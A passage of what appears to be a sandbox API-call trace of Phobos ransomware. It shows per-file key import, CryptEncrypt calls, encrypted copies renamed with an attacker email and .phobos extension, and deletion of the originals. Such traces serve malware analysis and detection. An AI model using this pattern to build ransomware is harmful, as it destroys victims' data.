dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0147.028] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.032] ReadFile (in: hFile=0x18c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x908, lpOverlapped=0x0) returned 1 [0147.033] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x910, dwBufLen=0x910 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x910) returned 1 [0147.033] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x910, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x910, lpOverlapped=0x0) returned 1 [0147.034] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0147.034] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.034] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0, dwBufLen=0xb0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0) returned 1 [0147.034] CryptDestroyKey (hKey=0xa32da8) returned 1 [0147.034] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x162, lpOverlapped=0x0) returned 1 [0147.034] CryptDestroyKey (hKey=0xa32d68) returned 1 [0147.034] CloseHandle (hObject=0x18c) returned 1 [0147.034] CloseHandle (hObject=0x138) returned 1 [0147.035] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db")) returned 0 [0147.036] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0147.036] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E36EA69-73D1-4458-9D16-50F8E31A69A0}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{4e36ea69-73d1-4458-9d16-50f8e31a69a0}.2.ver0x0000000000000001.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.036] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1048) returned 1 [0147.036] CloseHandle (hObject=0x138) returned 1 [0147.036] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E36EA69-73D1-4458-9D16-50F8E31A69A0}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{4e36ea69-73d1-4458-9d16-50f8e31a69a0}.2.ver0x0000000000000001.db")) returned 0x2020 [0147.037] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E36EA69-73D1-4458-9D16-50F8E31A69A0}.2.ver0x0000000000000001.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{4e36ea69-73d1-4458-9d16-50f8e31a69a0}.2.ver0x0000000000000001.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.037] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E36EA69-73D1-4458-9D16-50F8E31A69A0}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{4e36ea69-73d1-4458-9d16-50f8e31a69a0}.2.ver0x0000000000000001.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.037] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.037] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.037] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E36EA69-73D1-4458-9D16-50F8E31A69A0}.2.ver0x0000000000000001.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{4e36ea69-73d1-4458-9d16-50f8e31a69a0}.2.ver0x0000000000000001.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.037] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0147.037] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.037] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x418, lpOverlapped=0x0) returned 1 [0147.039] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x420, dwBufLen=0x420 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x420) returned 1 [0147.039] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x420, lpOverlapped=0x0) returned 1 [0147.111] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0147.111] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.111] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0, dwBufLen=0xb0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0) returned 1 [0147.111] CryptDestroyKey (hKey=0xa32da8) returned 1 [0147.111] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x162, lpOverlapped=0x0) returned 1 [0147.111] CryptDestroyKey (hKey=0xa32d68) returned 1 [0147.111] CloseHandle (hObject=0x138) returned 1 [0147.111] CloseHandle (hObject=0x18c) returned 1 [0147.112] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E36EA69-73D1-4458-9D16-50F8E31A69A0}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{4e36ea69-73d1-4458-9d16-50f8e31a69a0}.2.ver0x0000000000000001.db")) returned 0 [0147.112] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0147.112] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{4e4260a4-7e39-442e-bc22-7ff751d1c161}.2.ver0x0000000000000002.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.112] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2312) returned 1 [0147.113] CloseHandle (hObject=0x18c) returned 1 [0147.113] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{4e4260a4-7e39-442e-bc22-7ff751d1c161}.2.ver0x0000000000000002.db")) returned 0x2020 [0147.113] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{4e4260a4-7e39-442e-bc22-7ff751d1c161}.2.ver0x0000000000000002.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.113] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{4e4260a4-7e39-442e-bc22-7ff751d1c161}.2.ver0x0000000000000002.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.113] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.113] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.113] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{4e4260a4-7e39-442e-bc22-7ff751d1c161}.2.ver0x0000000000000002.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.113] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0147.113] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.113] ReadFile (in: hFile=0x18c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x908, lpOverlapped=0x0) returned 1 [0147.404] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x910, dwBufLen=0x910 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x910) returned 1 [0147.404] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x910, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x910, lpOverlapped=0x0) returned 1 [0147.405] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0147.405] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.405] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0, dwBufLen=0xb0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0) returned 1 [0147.405] CryptDestroyKey (hKey=0xa32d28) returned 1 [0147.405] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x162, lpOverlapped=0x0) returned 1 [0147.405] CryptDestroyKey (hKey=0xa32d68) returned 1 [0147.405] CloseHandle (hObject=0x18c) returned 1 [0147.405] CloseHandle (hObject=0x138) returned 1 [0147.406] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{4e4260a4-7e39-442e-bc22-7ff751d1c161}.2.ver0x0000000000000002.db")) returned 1 [0147.407] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0147.407] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000011.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.407] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=193424) returned 1 [0147.407] CloseHandle (hObject=0x138) returned 1 [0147.408] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000011.db")) returned 0x2020 [0147.408] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000011.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.408] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000011.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.408] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.408] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.408] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000011.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.408] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0147.408] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.408] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2f390, lpOverlapped=0x0) returned 1 [0147.471] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2f3a0, dwBufLen=0x2f3a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2f3a0) returned 1 [0147.472] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2f3a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2f3a0, lpOverlapped=0x0) returned 1 [0147.475] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0147.475] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.476] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0, dwBufLen=0xb0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0) returned 1 [0147.476] CryptDestroyKey (hKey=0xa32da8) returned 1 [0147.476] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x162, lpOverlapped=0x0) returned 1 [0147.476] CryptDestroyKey (hKey=0xa32d68) returned 1 [0147.476] CloseHandle (hObject=0x138) returned 1 [0147.476] CloseHandle (hObject=0x18c) returned 1 [0147.478] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000011.db")) returned 1 [0147.480] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0147.480] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.480] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=415096) returned 1 [0147.480] CloseHandle (hObject=0x18c) returned 1 [0147.481] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")) returned 0x2020 [0147.481] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.481] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.481] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.481] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.481] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.481] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0147.481] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.481] ReadFile (in: hFile=0x18c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x65578, lpOverlapped=0x0) returned 1 [0147.486] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x65580, dwBufLen=0x65580 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x65580) returned 1 [0147.491] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x65580, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x65580, lpOverlapped=0x0) returned 1 [0147.502] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0147.502] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.502] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0, dwBufLen=0xb0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0) returned 1 [0147.502] CryptDestroyKey (hKey=0xa32da8) returned 1 [0147.502] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x162, lpOverlapped=0x0) returned 1 [0147.503] CryptDestroyKey (hKey=0xa32d68) returned 1 [0147.503] CloseHandle (hObject=0x18c) returned 1 [0147.503] CloseHandle (hObject=0x138) returned 1 [0147.581] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")) returned 0 [0147.581] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0147.582] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-26.xml" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-report-2017-07-26.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.582] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=22016) returned 1 [0147.582] CloseHandle (hObject=0x138) returned 1 [0147.582] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-26.xml" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-report-2017-07-26.xml")) returned 0x20 [0147.582] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-26.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-report-2017-07-26.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.582] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-26.xml" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-report-2017-07-26.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.582] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.582] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.582] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-26.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-report-2017-07-26.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.582] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: 